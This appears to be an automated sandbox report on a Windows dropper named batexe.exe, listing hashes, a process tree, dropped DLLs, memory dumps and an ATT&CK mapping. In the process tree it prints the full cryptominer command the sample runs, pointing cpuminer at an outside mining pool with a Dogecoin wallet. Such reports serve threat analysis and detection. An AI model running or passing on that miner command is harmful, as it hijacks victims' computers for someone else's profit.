73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
292s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18/02/2024, 15:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
588	b2e.exe
4228	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4228	cpuminer-sse2.exe
4228	cpuminer-sse2.exe
4228	cpuminer-sse2.exe
4228	cpuminer-sse2.exe
4228	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1464-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1464 wrote to memory of 588	1464	batexe.exe	74
PID 1464 wrote to memory of 588	1464	batexe.exe	74
PID 1464 wrote to memory of 588	1464	batexe.exe	74
PID 588 wrote to memory of 3800	588	b2e.exe	75
PID 588 wrote to memory of 3800	588	b2e.exe	75
PID 588 wrote to memory of 3800	588	b2e.exe	75
PID 3800 wrote to memory of 4228	3800	cmd.exe	78
PID 3800 wrote to memory of 4228	3800	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1464
- C:\Users\Admin\AppData\Local\Temp\BBFD.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\BBFD.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\BBFD.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BECC.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3800
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\BBFD.tmp\b2e.exe

Filesize
2.7MB

MD5
74e740335a9f683916c1e7c986032d19

SHA1
26c66cdbac526c4f4b4c9130aaff123a8ee01134

SHA256
a072f596bc9334dd9240959802766a52b934885c602f7f91d17cf2f5a4d4595e

SHA512
573e8bc9ad16ab445c2814ce104e3803a1e9798a7798adb0bc841e1cef37b0fc20159a95dc46a59e83b24377aefe4cf3bd87b12403df2effbcbe172d6dc1ad26

Download Submit
C:\Users\Admin\AppData\Local\Temp\BBFD.tmp\b2e.exe

Filesize
3.3MB

MD5
efca662482556a6ba7958017d497c710

SHA1
81413c8c10b08e05e48d5409b5a6347bf0ddd8b2

SHA256
ddadf9115ca890261521d9e07bfdb7743e0d1a6732bb021ed48e25846760bc10

SHA512
1c3dc23f21798ca39d29e687c93dfc4aa5960be46b2950b5ff88fae1e65e9161b3bb55b09ee42f2742542b2919cb7979646ee0886bf72ef5b65435c78eee35be

Download Submit
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
931KB

MD5
2f402ae02215110a57eb97cc5b775cd5

SHA1
6f72d45e4f1062c30c239148ba12c365c17a2b07

SHA256
5859dad5d57a5c01a15a3ca3bca80fb85ba30d1d6bde4b42609005f3f0018134

SHA512
d8d0a3b2f0d840e5fb536c235ec2ba6e51aedc1a3c88a9794853825375561e9baa5cf78a225e2124ef3c28524636fc0a0eb7f4ac4295fb0aab2c3095e944a78d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
896KB

MD5
3a08bf1ae045413176866a2ae6bf66db

SHA1
da4b261b355afbbadb4db0aaad732caf3fbdfd90

SHA256
b733d67ea0abf4b3ebea593765059e39916e93d3fa699f297ceb3692998e671d

SHA512
93fca465c1418bcfd54fd12b18ae6670c09a97d11dfbb41c726dccc666c60850d4b93a60a6a38d96645bc7fef8f95e5b5a5ba0463317c31270700e3c8e7428e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
835KB

MD5
dd6a589a1bee28545b4d7c10f79ba74c

SHA1
45a5b9ddc87300550eda6c8f82c95d5840f9dd37

SHA256
685a6f7e75afe422d0bddc8b5ba70a881bf96acd5e191e93881f593813a16ab5

SHA512
bbefe3c50a88490b96b37dd97c16735e7c56192883ae7f82c27ab2f670a3cf9a5387722a64d6fb75dfe3090f93c9ea8e1daaa6f331cffc9568e0532dce995953

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
5177017411bf390ab6d7d9fb553b2495

SHA1
e35a889015225afb011cad5ceddd4422397a526b

SHA256
9060800b261c3f318f56e034af85bdc3d7968d29a4513a98060112a3ec10a357

SHA512
1906301e0eab8ee3cc16cd9f493c83462594f56a53211f8bc720e556497f03896e57aebc6b496d4d0436f3c5c5cdf8b7252566039d980e2494bf7ea034bf7ee6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
960KB

MD5
f3707fd5b389e53285dfb3815a4785b8

SHA1
788b2ac7be4acb28e804021893e11cdd44ee0784

SHA256
f7ef0e3e60989fac5636e6e5a018b730b403b75889125b56c4d07d6279e94c94

SHA512
f11d8577758db08f597987f525b4fc4c8c3f5181255f89281300968dc90fe4b298c322e3f531f768cd5014d116bb7161365c9d3fbaa76ab835405d8a1e231f26

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
472KB

MD5
dc89db9fac8a0bdd3fe9c87baf973d7f

SHA1
d68fd819b3bc5f7041ae01c0459bb662a31b3000

SHA256
b9dd09ee53c40b3a8eac768f380b5ae5347c3664225c3ff43baebce215c2f0b5

SHA512
a434e17c5046241ad4f3ceb79a96332e81a41375f3f3c5d5e28a0046c9ce76ab791c56ae8455cbe2a08e48d61c19e8478346098eade00159285f7b6845d37c80

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
616KB

MD5
4164262bc04b6fd58cb6074967f2eb1f

SHA1
334ec16adea9dc81a9bbff04684b8360cab66588

SHA256
542208cb5c6f57cfb904a0f74336ee05b94a339da8ae1a98270e79b2ed584fb1

SHA512
4d3d2e991a7d6575896b73e0fd13784ed94dc8f9f3f27ebb58ac2800ccbde2c9eec2b944bf866e42869e1c20b3fddc7f583d5850711e481752d2c374160a01ea

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
952KB

MD5
76842bd24e432999a5e13f186ed45cb5

SHA1
47782f1f9bb1892cd37de7e9f68fb57c1573656b

SHA256
b61fd17ab9d2657636bfd4e10a76fa7fdeb183544a7fb277701e322555d5f30c

SHA512
6fd848e8b5ef6952ac7a513b736ff1c84ce50cb07fcc404510a2f63b7b434c54a9be60fe86b3ae9019616af614b4087aaa53c06adcfb6a29a870e95c35fde188

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
599KB

MD5
b2c1bbb9cbc2b7fcda4c0711adb50a3a

SHA1
849644dfadfb8e4aa06ac04afb9f1eff597f8074

SHA256
0f3844573ec70aed53a1c50771a16e98cd16bf93caf1c2c90b521c4d3e18dc78

SHA512
7ce00762bf7bccbb28e60182e5df6e6ab1dc0762c129fde0d5c320423946de698e57255f98ec4df2db21246faf9e80e085b4f9b6dd576528abf47cdfb3835a7c

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
176KB

MD5
bdea9f048471752a399bdbe078350254

SHA1
1aa3d6ec6e590b6d6a87e7fde88c6f7d0c6b40c4

SHA256
593e5f84e37f8f68cf98824a969d2a83bb019a2c063c833ad0039f0d14299cac

SHA512
c745eb2fbe7013714add4f91f1894a612c2b3d0a61351c01bfcc8c2cc87eb83dd247c4119d1005946e6541dd5555fd9d9d5ac9df2694127164a53d472e279a58

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/588-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/588-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1464-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4228-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-43-0x0000000073DA0000-0x0000000073E38000-memory.dmp

Filesize
608KB

Download
memory/4228-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4228-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4228-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4228-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4228-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download